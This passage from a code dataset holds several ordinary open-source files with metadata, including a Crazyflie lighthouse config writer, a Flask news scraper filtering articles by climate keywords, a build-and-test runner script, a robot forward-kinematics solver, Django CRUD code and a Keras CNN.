missing')\n\n if data[LighthouseConfigFileManager.TYPE_ID] != LighthouseConfigFileManager.TYPE:\n raise Exception('Unsupported file type')\n\n if LighthouseConfigFileManager.VERSION_ID not in data:\n raise Exception('Version field missing')\n\n if data[LighthouseConfigFileManager.VERSION_ID] != LighthouseConfigFileManager.VERSION:\n raise Exception('Unsupported file version')\n\n result_system_type = LighthouseConfigFileManager.SYSTEM_TYPE_V2\n if LighthouseConfigFileManager.SYSTEM_TYPE_ID in data:\n result_system_type = data[LighthouseConfigFileManager.SYSTEM_TYPE_ID]\n\n result_geos = {}\n result_calibs = {}\n\n if LighthouseConfigFileManager.GEOS_ID in data:\n for id, geo in data[LighthouseConfigFileManager.GEOS_ID].items():\n result_geos[id] = LighthouseBsGeometry.from_file_object(geo)\n\n if LighthouseConfigFileManager.CALIBS_ID in data:\n for id, calib in data[LighthouseConfigFileManager.CALIBS_ID].items():\n result_calibs[id] = LighthouseBsCalibration.from_file_object(calib)\n\n return result_geos, 
result_calibs, result_system_type\n\n\nclass LighthouseConfigWriter:\n    \"\"\"\n    This class is used to write system config data to the Crazyflie RAM and persist to permanent storage\n    \"\"\"\n\n    def __init__(self, cf, nr_of_base_stations=16):\n        self._cf = cf\n        self._helper = LighthouseMemHelper(cf)\n        self._data_stored_cb = None\n        self._geos_to_write = None\n        self._geos_to_persist = []\n        self._calibs_to_persist = []\n        self._write_failed_for_one_or_more_objects = False\n        self._nr_of_base_stations = nr_of_base_stations\n\n    def write_and_store_config(self, data_stored_cb, geos=None, calibs=None, system_type=None):\n        \"\"\"\n        Transfer geometry and calibration data to the Crazyflie and persist to permanent storage.\n        The callback is called when done.\n        If geos or calibs is None, no data will be written for that data type.\n        If geos or calibs is a dictionary, the values for the base stations in the dictionary will be\n        transferred to the Crazyflie, data for all other base stations will be invalidated.\n        \"\"\"\n        if self._data_stored_cb is not None:\n            raise Exception('Write already in progress')\n        self._data_stored_cb = data_stored_cb\n\n        self._cf.loc.receivedLocationPacket.add_callback(self._received_location_packet)\n\n        self._geos_to_write = self._prepare_geos(geos)\n        self._calibs_to_write = self._prepare_calibs(calibs)\n\n        self._geos_to_persist = []\n        if self._geos_to_write is not None:\n            self._geos_to_persist = list(range(self._nr_of_base_stations))\n\n        self._calibs_to_persist = []\n        if self._calibs_to_write is not None:\n            self._calibs_to_persist = list(range(self._nr_of_base_stations))\n\n        self._write_failed_for_one_or_more_objects = False\n\n        if system_type is not None:\n            # Change system type first as this will erase calib and geo data in the CF.\n            # Changing system type may trigger a lengthy operation (up to 0.5 s) if the persistent memory requires\n            # defrag. Setting a param is an asynchronous operation, and it is not possible to know if the system\n            # switch is finished before we continue.\n            self._cf.param.set_value('lighthouse.systemType', system_type)\n\n            # We add a sleep here to make sure the change of system type is finished. It is dirty but will have to\n            # do for now. A more proper solution would be to add support for Remote Procedure Calls (RPC) with\n            # synchronous function calls.\n            time.sleep(0.8)\n\n        self._next()\n\n    def write_and_store_config_from_file(self, data_stored_cb, file_name):\n        \"\"\"\n        Read system configuration data from file and write/persist to the Crazyflie.\n        Geometry and calibration data for base stations that are not in the config file will be invalidated.\n        \"\"\"\n        geos, calibs, system_type = LighthouseConfigFileManager.read(file_name)\n        self.write_and_store_config(data_stored_cb, geos=geos, calibs=calibs, system_type=system_type)\n\n    def _next(self):\n        if self._geos_to_write is not None:\n            self._helper.write_geos(self._geos_to_write, self._upload_done)\n            self._geos_to_write = None\n            return\n\n        if self._calibs_to_write is not None:\n            self._helper.write_calibs(self._calibs_to_write, self._upload_done)\n            self._calibs_to_write = None\n            return\n\n        if len(self._geos_to_persist) > 0 or len(self._calibs_to_persist) > 0:\n            self._cf.loc.send_lh_persist_data_packet(self._geos_to_persist, self._calibs_to_persist)\n            self._geos_to_persist = []\n            self._calibs_to_persist = []\n            return\n\n        tmp_callback = self._data_stored_cb\n        self._data_stored_cb = None\n        if tmp_callback is not None:\n            tmp_callback(not self._write_failed_for_one_or_more_objects)\n\n    def _upload_done(self, success):\n        if not success:\n            self._write_failed_for_one_or_more_objects = True\n        self._next()\n\n    def _received_location_packet(self, packet):\n        # New geo data has been written and stored in the CF\n        if packet.type == self._cf.loc.LH_PERSIST_DATA:\n            self._next()\n\n    def _prepare_geos(self, geos):\n        result = None\n\n        if geos is not None:\n            result = dict(geos)\n\n            # Pad for base stations without data\n            empty_geo = LighthouseBsGeometry()\n            for id in range(self._nr_of_base_stations):\n                if id not in result:\n                    result[id] = empty_geo\n\n        return result\n\n    def _prepare_calibs(self, calibs):\n        result = None\n\n        if calibs is not None:\n            result = dict(calibs)\n\n            # Pad for base stations without data\n            empty_calib = LighthouseBsCalibration()\n            for id in range(self._nr_of_base_stations):\n                if id not in result:\n                    result[id] = empty_calib\n\n        return result\n","repo_name":"bitcraze/crazyflie-lib-python","sub_path":"cflib/localization/lighthouse_config_manager.py","file_name":"lighthouse_config_manager.py","file_ext":"py","file_size_in_byte":7933,"program_lang":"python","lang":"en","doc_type":"code","stars":227,"dataset":"github-code","pt":"21"}
+{"seq_id":"69900084854","text":"import sys\nfrom sense_hat import SenseHat\nimport time\nimport requests\nimport json\n\nsense = SenseHat()\ntemp_adjust = 16\nadd_meting_url = \"http://Server_URL/AddTempMeting\"\nmeting_time = 10\n\ndef saveGUID(guid_to_save):\n    f = open(\"guid.txt\", \"w\")\n    f.write(guid_to_save)\n    f.close()\n    \ndef getGUID():\n    f = open(\"guid.txt\", \"r\")\n    line = f.read()\n    print(f.read())\n    f.close()\n    line = line.strip('\\n')\n    line = line.strip('\\t')\n    return line\n\nguid = getGUID()\n\nwhile True:\n    time_begin = time.time()\n    value = round(sense.get_temperature()-temp_adjust, 1)\n    print (guid)\n    \n    url = add_meting_url+\"?meting=\"+str(value)+\"&guid=\"+str(guid)\n    \n\n    response = requests.post(url)\n    res_json = json.loads(response.text)\n    for key, value in res_json.items():\n        if (key == 'guid'):\n            guid = value\n            saveGUID(value)\n            print (\"Successfully added temp\")\n        else:\n            print (\"Error: \" + value)\n    \n    time_done = time.time()\n    time_exp = time_done - time_begin\n    time.sleep(meting_time - time_exp)\n    
\n\n\n","repo_name":"Joehoel/nerdygadgets","sub_path":"config/migrations/NerdyGadgets.py","file_name":"NerdyGadgets.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36676813382","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('' , views.home , name='home'),\n path('category/' , views.home , name='post_by_category'),\n path('category//' , views.details_page , name='post_details'),\n path('account/create_an_account/' , views.sign_up , name='sign_up'),\n path('account/login' , views.sign_in , name='sign_in'),\n path('sign_out' , views.logoutView , name='sign_out'),\n path('about/' , views.about , name='about'),\n path('search/' , views.search , name='search'),\n path('contact/' , views.contact , name=\"contact\"),\n]\n\n","repo_name":"hassan-ajdour-99/Devfly","sub_path":"web_project/MainApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38089232932","text":"import random\nimport outputcontroller\n\n\nclass Creature:\n\n def __init__(self, name, hp, mana, strength, dexterity, intelligence):\n self.name = name\n self.hp = hp\n self.mana = mana\n self.strength = strength\n self.dexterity = dexterity\n self.intelligence = intelligence\n\n def attack(self, target):\n raise NotImplementedError\n\n def resistance(self, stat):\n return self.dexterity - stat\n\n def weapon_attack(self, target):\n resistance = self.resistance(target.strength)\n damage = self.strength*5 - resistance * 2\n self._attack_helper(target, damage)\n\n def spell_attack(self, target):\n self.mana -= 10\n resistance = self.resistance(target.intelligence)\n damage = self.intelligence*5 - resistance * 2\n self._attack_helper(target, damage)\n\n def _attack_helper(self, target, damage):\n critical = False\n if random.randint(0, 9) == 0:\n damage *= 2\n critical = True\n outputcontroller.attacks(self.name, target.name, damage, critical)\n target.hp -= damage\n","repo_name":"tsvetankoev/Rogue-like-like","sub_path":"src/creature.py","file_name":"creature.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"47834244914","text":"''' \npythonanywhere has a whitelist of sites\nand free users are only allowed to request html from those\nwhitelisted sites\n\neither ask pythonanywhere to add sites to whitelist or\ncheck out how to deploy on AWS instead maybe:\n\nhttps://victormerino.medium.com/running-a-python-script-24-7-in-cloud-for-free-amazon-web-services-ec2-76af166ae4fb\n'''\n\n# folder that the scrapers are in\nSCRAPERS_FOLDER_NAME = 'website_scrapers'\n\n\"\"\"\nTo add new scrapers, put the scraping function into its own file in the website_scrapers folder.\n\nSee the existing examples in the website_scrapers folder for clarification.\n\nNext, add the name of the file and function names that the scraper is in to the array below.\n\"\"\"\n# file name first, then function name\nSCRAPERS = [\n ['scrape_bbc.py', 'scrape_bbc'],\n ['scrape_detroit_news.py', 'scrape_detroit_news'],\n ['scrape_mlive.py', 'scrape_mlive']\n]\n\nKEYWORDS = [\n \"ocean\",\n \"polar\",\n \"electric\",\n \"nature\",\n \"iceberg\",\n \"biodiversity\",\n \"green\",\n \"warm\",\n \"biology\",\n \"plant\",\n \"living\",\n \"carbon\",\n \"coronavirus\",\n 'abatement',\n 'acid',\n 'air 
pollution',\n 'air quality',\n 'algae',\n 'algal blooms',\n 'alternative energy sources',\n 'amenities',\n 'atmosphere',\n 'backyard burning',\n 'ber',\n 'biodegradable waste',\n 'biodiversity',\n 'bioenergy',\n 'biofuels',\n 'biomass',\n 'biosphere',\n 'black bin (grey bin)',\n 'bring bank',\n 'brown bin',\n 'bye-law',\n 'carbon',\n 'carpooling',\n 'cfcs',\n 'cfl bulbs',\n 'civic amenity site',\n 'climate',\n 'climate change',\n 'compost',\n 'compostable',\n 'composting',\n 'conservation',\n 'cryptosporidium',\n 'deforestation',\n 'development plan',\n 'dioxins',\n 'disposal',\n 'domestic charges',\n 'domestic waste',\n 'draught proofing',\n 'dumping',\n 'ecosystem',\n 'ecotourism',\n 'effluent',\n 'electric vehicle',\n 'emissions',\n 'emissions projections',\n 'emssions trading allowance',\n 'end-of-life vehicle',\n 'energy efficiency',\n 'energy rating',\n 'energy star',\n 'environmental impact statement',\n 'flora and fauna',\n 'fossil fuels',\n 'fuel poverty',\n 'global warming',\n 'green bin',\n 'green design',\n 'greener homes scheme',\n 'greenhouse effect',\n 'greenhouse gases',\n 'ground water',\n 'habitat',\n 'hazardous waste',\n 'home energy saving scheme',\n 'household waste',\n 'incinerator',\n 'insulation',\n 'kyoto protocol',\n 'kyoto agreement',\n 'landfill',\n 'litter',\n 'mbt',\n 'mulch',\n 'municipal waste',\n 'noise pollution',\n 'npws',\n 'nss',\n 'noxious gases',\n 'oil spill',\n 'organic food',\n 'organic',\n 'organism',\n 'ozone layer',\n 'particulate matter',\n 'pay by weight',\n 'pesticides',\n 'permits',\n 'planning permission',\n 'plastic bag levy',\n 'post-consumer waste',\n 'radiation',\n 'radioactive',\n 'radon',\n 'recycle',\n 'reforestation',\n 'refuse',\n 'renewable',\n 'reuse',\n 'river basin',\n 'sewage',\n 'smog',\n 'smokeless fuel',\n 'solar panel',\n 'standing charges',\n 'surface water',\n 'sustainable',\n 'toxic',\n 'toxin',\n 'traffic calming',\n 'traffic management',\n 'tidy towns',\n 'utility',\n 'un framework convention on climate change',\n 'unesco world heritage site',\n 'ventilation',\n 'warmer homes scheme',\n 'waste management',\n 'waste prevention',\n 'water vapour',\n 'weee',\n 'wind energy',\n 'wind turbine',\n 'zero emissions',\n]\n\n################################################################\n# Configuration Stuff Above, Main Code Below\n################################################################\n\n# flask: web framework for rendering website\nfrom flask import Flask, render_template\n\n# importlib: dynamically import scrapers (no need to add new functions and stuff below when additional scrapers are made)\nfrom importlib import import_module \n\nfrom filter_for_keywords import filter_for_keywords\n\n# dynamically imports the scraper functions from the scrapers array (each scraper in the array is itself an array where the first item is the name of the file the scraper is in and the second item the name of the scraping function within that file)\n# returns a list of all the imported scraper functions\ndef import_scraper_functions(folder_name, scrapers):\n # list to be returned at end containing all the imported scraper functions\n all_scraper_functions = []\n\n # import each scraper_function, and use it to\n # scrape and filter articles from each website\n # and finally add every article into all_articles\n for file_name, function_name in scrapers:\n # remove the .py from end if its included in original file_name\n # this is because import_module only takes in the file_name without any .py extension\n if 
file_name.endswith('.py'):\n file_name = file_name[:-3]\n\n # format the filepath so that it can be imported by import_module\n formatted_filepath = folder_name + '.' + file_name\n\n # import the file containing the scraping function\n scraper_file = import_module(formatted_filepath)\n\n # get the actual scraping function from the imported file\n scraper_function = getattr(scraper_file, function_name)\n\n\n # add newly imported scraper function to the overarching list\n all_scraper_functions.append(scraper_function)\n\n return all_scraper_functions\n\n# runs all the scraper functions in the list given to it\n# and uses them to scrape, and filter, the articles from each website\n# finally, it returns a giant dictionary containing all the scraped and filtered articles across all the websites\n# this function may need to be made async in the future, if it takes too much time to run all the scrapers 1-by-1\ndef get_articles(scraper_functions, keywords):\n # will use this to return combined filtered articles dictionary across all websites\n # keys are article titles, vals are article url's\n all_articles = {}\n\n for scraper_function in scraper_functions:\n # run the scraper\n scraped_articles = scraper_function()\n filtered_articles = filter_for_keywords(scraped_articles, keywords)\n # add scraped & filtered articles from a particular website to all_articles\n all_articles.update(filtered_articles)\n \n return all_articles\n\napp = Flask('app')\n\n@app.route('/')\ndef main():\n # import the various scraper functions we made\n scraper_functions = import_scraper_functions(SCRAPERS_FOLDER_NAME, SCRAPERS)\n\n # run the scraper functions, and filter the scraped articles, and combine all articles into one dictionary\n articles = get_articles(scraper_functions, KEYWORDS)\n\n # make the actual website\n return render_template('main.html', articles=articles )\n\n@app.route('/generalized_scraper')\ndef run_generalized_scraper():\n import generalized_scraper\n\n scraper_inputs = [\n {\n 'name': 'BBC Science & Environment',\n 'url': 'https://www.bbc.com/news/science_and_environment',\n 'prefix': 'https://bbc.com',\n 'link_selector': 'a[href ^= \"/news\"].gs-c-promo-heading',\n 'headline_selector': 'h3',\n },\n {\n 'name': 'Detroit News',\n 'url': 'https://www.detroitnews.com/news/',\n 'prefix': 'https://www.detroitnews.com/story',\n 'link_selector': 'a.gnt_m_flm_a',\n 'headline_selector': None,\n },\n {\n 'name': 'Mlive',\n 'url': 'https://www.mlive.com/',\n 'prefix': '',\n 'link_selector': 'a[data-ga-content-type = \"article\"]',\n 'headline_selector': None,\n }\n ]\n\n articles = generalized_scraper.get_articles(scraper_inputs)\n\n articles = filter_for_keywords(articles, KEYWORDS)\n\n return render_template('main.html', articles=articles)\n\napp.run(host='0.0.0.0', port=8080)","repo_name":"DhanujG/NLP-Machine-Learning-in-Environmental-News-Web-Scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"7000152344","text":"import os\nimport sys\nimport json\nimport argparse\n\n# returns a normalized path to the project root directory\ndef get_root_dir():\n import sys\n\n return os.path.normpath(\n os.path.join(\n os.path.dirname(sys.argv[0]),\n os.path.pardir\n )\n )\n\n\n# returns the path to the build directory\ndef get_build_dir(options):\n try:\n with open(os.path.join(get_root_dir(), \"BINARY_DIR\"), \"rt\") as bdf:\n return bdf.read()\n except: return 
os.path.join(get_root_dir(), \"_build\");\n\n\n# returns the path to the config script\ndef configure_script():\n return os.path.join(get_root_dir(), \"configure.py\")\n\n\n# executes a command in a subprocess\ndef execute_command(options, cmd_line, work_dir, simulate=None, quiet=False):\n import subprocess\n\n if simulate is None: simulate = options.dry_run\n if simulate or not quiet:\n if len(cmd_line) == 1:\n cmd_str = cmd_line[0]\n else: cmd_str = cmd_line[0]+\" '\"+str(\"' '\").join(cmd_line[1:])+\"'\"\n\n if work_dir == os.path.curdir:\n print(cmd_str)\n else: print(\"(cd %s && %s)\" % (work_dir, cmd_str))\n sys.stderr.write(\"%s\\n\" % cmd_str)\n if not simulate:\n subprocess.check_call(cmd_line, cwd=work_dir)\n\n# executes the configure script\ndef execute_configure(options, parameters, simulate=None, quiet=False):\n\n if options.jobs is None:\n job_params = list()\n else: job_params = [\"--jobs\", str(options.jobs)]\n\n execute_command(\n options,\n [configure_script()]+job_params+parameters+options.config_options,\n get_root_dir(),\n simulate, quiet\n )\n\n# executes ctest in the configured test directory\ndef execute_ctest(options):\n if options.jobs is None:\n job_params = list()\n else: job_params = [\"-j\", str(options.jobs)]\n\n test_dir = os.path.join(get_build_dir(options), \"test\")\n\n import subprocess\n\n try:\n execute_command(\n options,\n [\"ctest\"]+job_params,\n test_dir\n );\n except subprocess.CalledProcessError as procError:\n failed_tests_path = os.path.join(\n test_dir,\n \"Testing\", \"Temporary\", \"LastTestsFailed.log\"\n )\n with open(failed_tests_path) as failed_tests:\n for line in failed_tests:\n test_name = line.rstrip().split(':')[1]\n test_lib = test_name.split('-')[0]\n\n try:\n cmd_line = [\"ctest\", \"-VV\", \"-R\", test_name];\n proc = subprocess.Popen(\n cmd_line,\n stdout=sys.stderr,\n stderr=sys.stderr,\n cwd=test_dir)\n proc.communicate()\n except subprocess.CalledProcessError:\n pass\n except OSError as osError:\n if osError.errno == os.errno.ENOENT:\n pass\n sys.stderr.write(\"%s\\n\" % (str(procError)))\n\n\n# options for the --gl-apis parameter\ngl_libs_names = [\"default\", \"all-apis\", \"all-libs\"]\n# options for the --test-level parameter\ntest_level_names = [\"minimal\", \"basic\", \"extended\", \"complete\"]\n# options for the --test-type parameter\ntest_type_names = [\"everything\", \"ctest\", \"build-examples\", \"configure-gl\"]\n\n# checks if arg is valid option for --gl-libs\ndef gl_libs_value(arg):\n if(arg in gl_libs_names):\n return arg;\n else:\n msg = \"'%s' is not a valid GL library combination\" % str(arg)\n raise argparse.ArgumentTypeError(msg)\n\n# checks if arg is valid option for --test-level\ndef test_level_value(arg):\n if(arg in test_level_names):\n return arg;\n else:\n msg = \"'%s' is not a valid test level\" % str(arg)\n raise argparse.ArgumentTypeError(msg)\n\n# checks if arg is valid option for --test-type\ndef test_type_value(arg):\n if(arg in test_type_names):\n return arg;\n else:\n msg = \"'%s' is not a valid test type\" % str(arg)\n raise argparse.ArgumentTypeError(msg)\n\n\n# checks if the value specfied as --test-level was at least level\ndef test_level_at_least(options, level):\n result = True\n for name in test_level_names:\n if name == level:\n break\n if name == options.test_level:\n result = False\n return result\n\n# checks if the value specfied as --gl-libs was at least level\ndef gl_libs_at_least(options, level):\n result = True\n for name in gl_libs_names:\n if name == level:\n break\n if 
name == options.gl_libs:\n result = False\n return result\n\n\ndef execute_tests(options, parameters):\n for name in set(options.test_type):\n if name == \"everything\":\n execute_configure(options, parameters+[\"--build\"])\n execute_ctest(options)\n elif name == \"ctest\":\n execute_configure(options, parameters+[\"--no-examples\"])\n execute_ctest(options)\n elif name == \"build-examples\":\n execute_configure(options, parameters+[\"--no-tests\", \"--build\"])\n elif name == \"configure-gl\":\n execute_configure(options, parameters+[\"--gl-tests-compile-only\", \"--debug-gl-ver-error\", \"--no-tests\", \"--no-examples\"])\n\n\ndef for_each_gl_init_lib(options, parameters):\n func = execute_tests\n if gl_libs_at_least(options, \"all-libs\"):\n for gl_init_lib in options.config_info['gl_init_libs']:\n func(options, parameters+[\"--use-gl-init-lib=%s\" % gl_init_lib])\n else:\n func(options, parameters)\n\n\ndef for_each_gl_api_lib(options, parameters):\n func = for_each_gl_init_lib\n if gl_libs_at_least(options, \"all-apis\"):\n for gl_api_lib in options.config_info['gl_api_libs']:\n func(options, parameters+[\"--use-gl-api-lib=%s\" % gl_api_lib])\n else:\n func(options, parameters)\n\n\ndef for_each_profile(options, parameters):\n func = for_each_gl_api_lib\n if not test_level_at_least(options, \"extended\"):\n parameters = parameters+[\"--no-enum-tests\"]\n\n if test_level_at_least(options, \"basic\"):\n func(options, parameters+[\"--low-profile=True\"])\n func(options, parameters+[\"--low-profile=False\"])\n else:\n func(options, parameters)\n\n\n# creates the command line argument parser\ndef get_argument_parser():\n\n def JobCountValue(arg):\n msg_fmt = \"'%s' is not a valid process count value\"\n try:\n if int(arg) <= 0:\n msg = msg_fmt % str(arg)\n raise argparse.ArgumentTypeError(msg)\n else:\n return int(arg)\n except:\n msg = msg_fmt % str(arg)\n raise argparse.ArgumentTypeError(msg)\n\n argparser = argparse.ArgumentParser(\n prog=\"test\",\n description=\"\"\"\n Utility script running various tests\n \"\"\",\n epilog=\"\"\"\n Copyright (c) Matúš Chochlík.\n Permission is granted to copy, distribute and/or modify this document\n under the terms of the Boost Software License, Version 1.0.\n (See a copy at http://www.boost.org/LICENSE_1_0.txt)\n \"\"\"\n )\n\n argparser.add_argument(\n \"--dry-run\",\n default=False,\n action=\"store_true\",\n help=\"\"\"\n Only print the commands that should be executed\n but don't do anything.\n \"\"\"\n )\n\n argparser.add_argument(\n \"--development\",\n default=False,\n action=\"store_true\",\n help=\"\"\"\n Run all tests usually done for development testing.\n \"\"\"\n )\n argparser.add_argument(\n \"--release\",\n default=False,\n action=\"store_true\",\n help=\"\"\"\n Run all tests usually done for release candidate testing.\n \"\"\"\n )\n\n argparser.add_argument(\n \"--jobs\",\n type=JobCountValue,\n default=None,\n action=\"store\",\n help=\"\"\"\n Specifies the number of parallel jobs to be used.\n \"\"\"\n )\n\n argparser.add_argument(\n \"--max-jobs\",\n type=JobCountValue,\n default=None,\n action=\"store\",\n help=\"\"\"\n Specifies the maximum number of parallel jobs to be used.\n \"\"\"\n )\n\n argparser.add_argument(\n \"--gl-libs\",\n type=gl_libs_value,\n default=None,\n help=\"\"\"\n Influences the GL library combinations with which\n the tests are configured and executed (%(options)s).\n \"\"\" % {\"options\": str(gl_libs_names)}\n )\n\n argparser.add_argument(\n \"--test-level\",\n type=test_level_value,\n default=None,\n 
help=\"\"\"\n Influences the number of configurations in which\n the tests are executed (%(options)s).\n \"\"\" % {\"options\": str(test_level_names)}\n )\n\n argparser.add_argument(\n \"--test-type\",\n type=test_type_value,\n default=list(),\n action=\"append\",\n help=\"\"\"\n Specifies the test type(s) to be executed (%(options)s).\n \"\"\" % {\"options\": str(test_type_names)}\n )\n\n argparser.add_argument(\n \"--config-info\",\n default=dict()\n )\n\n argparser.add_argument(\n \"--config\",\n dest=\"config_options\",\n nargs=argparse.REMAINDER,\n default=list(),\n help=\"\"\"\n Everything following this option will be passed\n to configure verbatim.\n \"\"\"\n )\n\n return argparser\n\n\ndef main():\n import os, sys\n try:\n # parse and process the command-line arguments\n argparser = get_argument_parser()\n options = argparser.parse_args()\n\n # set the test level if none\n if options.test_level is None:\n if options.release:\n options.test_level = \"complete\"\n elif options.development:\n options.test_level = \"basic\"\n else: options.test_level=\"minimal\"\n\n # set the test type if empty\n if len(options.test_type) == 0:\n options.test_type = [\"everything\"]\n\n if options.jobs is None:\n try:\n import multiprocessing\n options.jobs = multiprocessing.cpu_count()+1\n except: pass\n\n # limit the number of jobs\n if options.jobs is not None and options.max_jobs is not None:\n if options.jobs > options.max_jobs:\n options.jobs = options.max_jobs\n\n # set the gl-libs if none\n if options.gl_libs is None:\n if options.release:\n options.gl_libs = \"all-libs\"\n elif options.development:\n options.gl_libs = \"all-apis\"\n elif test_level_at_least(options, \"basic\"):\n options.gl_libs =\"all-apis\"\n else: options.gl_libs =\"default\"\n\n\n # if necessary ..\n if gl_libs_at_least(options, \"all-apis\"):\n # get configuration info\n execute_configure(\n options,\n [\"--clean\", \"--info-only\"],\n simulate=False,\n quiet=True\n )\n # load configuration info\n options.config_info = json.load(\n open(os.path.join(get_build_dir(options), 'config', 'info.json'))\n )\n\n for_each_profile(options, [\"--clean\", \"--with-clang-tidy\"])\n\n except RuntimeError as rte:\n print(\"Runtime error: \" + str(rte))\n\nif __name__ == \"__main__\": main()\n\n","repo_name":"matus-chochlik/oglplu2","sub_path":"tools/run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":11392,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"21"} +{"seq_id":"17428765862","text":"# Solve lab1 robot forward kinematics by another Denavit-Hartenberg convention\nimport numpy as np\nfrom tests import sanity_checks, lab_trials\n\n\ndef forward_k(q_list):\n \"\"\"Compute forward kinematics by D-H approach\n Args:\n q_list: a list of q values\n Returns:\n end effector position as an array\n \"\"\"\n\n def DH_T(params):\n \"\"\"Give the tranformation given D-H parameters\n Args:\n params: alpha, a, d, phi as a list\n Returns:\n 4x4 transformation matrix\n \"\"\"\n alpha, a, d, phi = params\n cp = np.cos(phi)\n sp = np.sin(phi)\n ca = np.cos(alpha)\n sa = np.sin(alpha)\n return np.array([[cp, -sp, 0, a],\n [sp*ca, cp*ca, -sa, -d*sa],\n [sp*sa, cp*sa, ca, d*ca],\n [0, 0, 0, 1]])\n\n # Convert to radians, and put q6 to front\n q_converted = [q_list[-1]] + list(np.deg2rad(q_list[:-1]))\n\n # DH parameters in the order of alpha, a, d, phi\n DH_parameters = [[0, 0, 10, q_converted[1]],\n [-np.pi/2, 0, 0, -np.pi/2+q_converted[2]],\n [0, 10, 0, np.pi/2+q_converted[3]],\n 
[0, 10, 0, -np.pi/2+q_converted[4]],\n [-np.pi/2, 0, 2, np.pi+q_converted[5]]]\n\n # Form and concatenate transformation matrices together\n T = np.identity(4)\n for params in DH_parameters:\n T = np.matmul(T, DH_T(params))\n\n # Return position, with track translation added\n return T[:3, 3] + np.array([q_converted[0], 0, 0])\n\n\nif __name__ == \"__main__\":\n sanity_checks(forward_k)\n lab_trials(forward_k)\n","repo_name":"one-for-all/TF-ES259-Labs","sub_path":"lab1/dh2_solution.py","file_name":"dh2_solution.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23622533988","text":"from typing import List\nfrom backend.db.base import CRUDBase\nfrom backend.core.config import settings\nfrom backend.models.user import User\nfrom backend.models.roles import AnswerChangeRoleRequest, ChangeRoleRequest, ChangeRoleRequestStatus\n\n\nclass ChangeRolesCruds(CRUDBase):\n def send_change_role_message(self, user_id, message, files) -> ChangeRoleRequest:\n db_change_role_request = ChangeRoleRequest(\n files=files,\n message=message,\n user_id=user_id\n )\n return self.create(db_change_role_request)\n\n def get_all_change_role_messages(self, page: int = 1, filter: ChangeRoleRequestStatus = None, page_size: int = settings.CHANGE_ROLE_PAGE_ITEMS) -> List[ChangeRoleRequest]:\n end = page * page_size\n query = self.db.query(ChangeRoleRequest).order_by(\n ChangeRoleRequest.id.desc())\n if filter:\n query = query.where(ChangeRoleRequest.request_status == filter)\n return query.slice(end-page_size, end).all()\n\n def get_user_change_role_messages(self, user_id, page: int, page_size: int = settings.CHANGE_ROLE_PAGE_ITEMS):\n\n end = page * page_size\n return self.db.query(ChangeRoleRequest).filter(ChangeRoleRequest.user_id == user_id).order_by(ChangeRoleRequest.id.desc()).slice(end-page_size, end).all()\n\n def get_current_user_change_role_message(self, user_id):\n return self.db.query(ChangeRoleRequest).filter(ChangeRoleRequest.user_id == user_id, ChangeRoleRequest.request_status == ChangeRoleRequestStatus.in_progress).first()\n\n def is_has_change_role_messages(self, user_id):\n return bool(self.db.query(ChangeRoleRequest).filter(ChangeRoleRequest.user_id == user_id).first())\n\n def user_have_active_change_role_request(self, user_id: int) -> bool:\n result = self.db.query(ChangeRoleRequest)\\\n .filter(ChangeRoleRequest.user_id == user_id, ChangeRoleRequest.request_status == ChangeRoleRequestStatus.in_progress)\\\n .first()\n return result is not None\n\n def user_have_change_role_request(self, user_id: int) -> bool:\n result = self.db.query(ChangeRoleRequest)\\\n .filter(ChangeRoleRequest.user_id == user_id)\\\n .first()\n return result is not None\n\n def get_change_role_message(self, request_id) -> ChangeRoleRequest:\n return self.db.query(ChangeRoleRequest).filter(ChangeRoleRequest.id == request_id).first()\n\n def send_change_role_message_answer(self, request: ChangeRoleRequest, message: str, request_status: ChangeRoleRequestStatus):\n answer: AnswerChangeRoleRequest = request.answer\n user: User = request.user\n if request_status == ChangeRoleRequestStatus.accepted:\n user.type = settings.UserTypeEnum.musician\n elif request_status == ChangeRoleRequestStatus.rejected:\n user.type = settings.UserTypeEnum.user\n self.update(user)\n if not answer:\n answer = self.create(AnswerChangeRoleRequest(\n request_id=request.id,\n message=message\n ))\n else:\n answer.message = message\n self.update(answer)\n 
request.request_status = request_status\n self.update(request)\n return answer\n\n def get_not_answered_change_role_request_count(self):\n return self.db.query(ChangeRoleRequest).filter(ChangeRoleRequest.request_status == ChangeRoleRequestStatus.in_progress).count()\n","repo_name":"Semolik/music","sub_path":"backend/crud/crud_change_roles.py","file_name":"crud_change_roles.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"38624074786","text":"import tensorflow as tf\nimport numpy as np\nfrom tensorflow import keras\n\n# Loading the data\nfashion_mnist = keras.datasets.fashion_mnist\n(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()\n\nmodel = keras.models.Sequential([\n\tkeras.layers.Conv2D(64, (3, 3), activation = 'relu', input_shape = (28, 28, 1)),\n\tkeras.layers.MaxPooling2D(2, 2),\n\tkeras.layers.Conv2D(64, (3, 3), activation = 'relu'),\n\tkeras.layers.MaxPooling2D(2, 2),\n\tkeras.layers.Flatten(),\n\tkeras.layers.Dense(128, activation = 'relu'),\n\tkeras.layers.Dense(10, activation = 'softmax')\n\t])\n\nprint(model.summary())\n\ntrain_images = train_images.reshape(60000, 28, 28, 1)\ntest_images = test_images.reshape(10000, 28, 28, 1)\n\ntrain_images = train_images / 255.0\ntest_images = test_images / 255.0\n\nmodel.compile(optimizer = tf.train.AdamOptimizer(), loss = 'sparse_categorical_crossentropy', metrics = ['accuracy'])\nmodel.fit(train_images, train_labels, epochs = 